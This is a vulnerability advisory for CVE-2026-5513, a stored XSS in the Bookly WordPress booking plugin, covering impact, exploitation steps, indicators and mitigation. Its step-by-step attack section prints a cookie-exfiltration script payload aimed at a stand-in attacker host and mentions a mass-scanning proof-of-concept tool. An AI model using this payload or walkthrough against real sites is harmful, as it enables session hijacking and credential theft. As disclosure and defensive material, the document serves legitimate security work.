CVE-2026-5513: 
WordPress Analyse et atténuation des vulnérabilités

CVE-2026-5513 is a Stored Cross-Site Scripting (XSS) vulnerability in the "Online Scheduling and Appointment Booking System – Bookly" plugin for WordPress, affecting versions up to and including 27.2. The flaw exists in the bookly-customer-full-name cookie due to insufficient input sanitization and output escaping, allowing unauthenticated attackers to inject arbitrary web scripts. Exploitation requires the "Remember personal information in cookies" setting to be enabled, which is disabled by default. It was published on June 13, 2026, with a CVSS v3.1 base score of 7.2 (High) (GitHub Advisory, Wordfence).

The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation – Cross-site Scripting). When the "Remember personal information in cookies" feature is enabled, the Bookly plugin reads and renders the bookly-customer-full-name cookie value without adequate sanitization or output escaping, allowing attacker-controlled content to be stored and later reflected into page output. An unauthenticated attacker can craft a malicious cookie value containing JavaScript, which is then executed in the browsers of any user who visits an affected page. A public Python-based proof-of-concept exploit is available that automates detection and injection against vulnerable Bookly installations (GitHub Advisory, PoC Exploit).

Successful exploitation allows an unauthenticated attacker to execute arbitrary JavaScript in the browsers of users visiting pages where the malicious cookie value has been rendered. This can lead to session cookie theft, credential harvesting, unauthorized actions performed on behalf of authenticated users (including administrators), and redirection to malicious sites. The scope is changed (S:C in CVSS), meaning the injected script can affect resources beyond the vulnerable component itself, such as the broader WordPress site and its users (GitHub Advisory, Wordfence).

1. Reconnaissance: Use tools such as Shodan, Censys, or automated scanners to identify WordPress sites running the Bookly plugin (versions ≤ 27.2) with the "Remember personal information in cookies" setting enabled. The public PoC supports mass scanning from a target list with multi-threaded execution.
2. Verify target configuration: Confirm that the vulnerable setting is active by interacting with the Bookly booking form and observing whether a bookly-customer-full-name cookie is set or accepted by the server.
3. Craft malicious cookie: Construct an HTTP request that sets the bookly-customer-full-name cookie to a JavaScript payload, e.g., <script>document.location='https://attacker.com/steal?c='+document.cookie</script>.
4. Inject payload: Submit the crafted cookie to the target site using the --inject flag of the PoC tool or via a manual HTTP request. The plugin stores or reflects the unsanitized cookie value into page output.
5. Trigger execution: When any user (including administrators) visits an affected page that renders the injected cookie value, the malicious script executes in their browser, enabling session hijacking, credential theft, or further attacks (PoC Exploit, GitHub Advisory).

• Network: Unusual HTTP requests to Bookly booking pages containing bookly-customer-full-name cookie values with JavaScript tags or encoded script payloads (e.g., <script>, %3Cscript%3E, javascript:).
• Network: Outbound connections from user browsers to unknown external domains shortly after visiting booking-related pages, potentially indicating cookie exfiltration.
• Logs: Web server access logs showing requests with anomalous Cookie headers containing HTML/JavaScript content in the bookly-customer-full-name field.
• Logs: WordPress or server logs showing repeated automated requests to booking pages from a single IP or range, consistent with mass scanning activity.
• File System: Unexpected modifications to Bookly plugin files or WordPress theme files that could indicate follow-on compromise after session hijacking.
• Process/Browser: Users reporting unexpected redirects or pop-ups when accessing booking or scheduling pages on the WordPress site (PoC Exploit, GitHub Advisory).

Update the Bookly plugin to a version beyond 27.2, where the patch (changeset 3504922) addresses the insufficient sanitization and output escaping of the bookly-customer-full-name cookie (Wordfence, Plugin Changeset). As an immediate workaround, ensure the "Remember personal information in cookies" setting is disabled (it is off by default), which prevents the vulnerable code path from being triggered. Additionally, implementing a strict Content Security Policy (CSP) header can limit the impact of any XSS by restricting unauthorized script execution on the site.

The vulnerability was assigned and disclosed by Wordfence, which maintains a dedicated threat intelligence entry for it. Social media activity was observed on Mastodon (via RedPacketSecurity and VulDB accounts) and Bluesky shortly after disclosure, reflecting routine community tracking of new WordPress plugin CVEs. No major vendor statements or notable researcher commentary beyond the initial disclosure have been identified (Wordfence).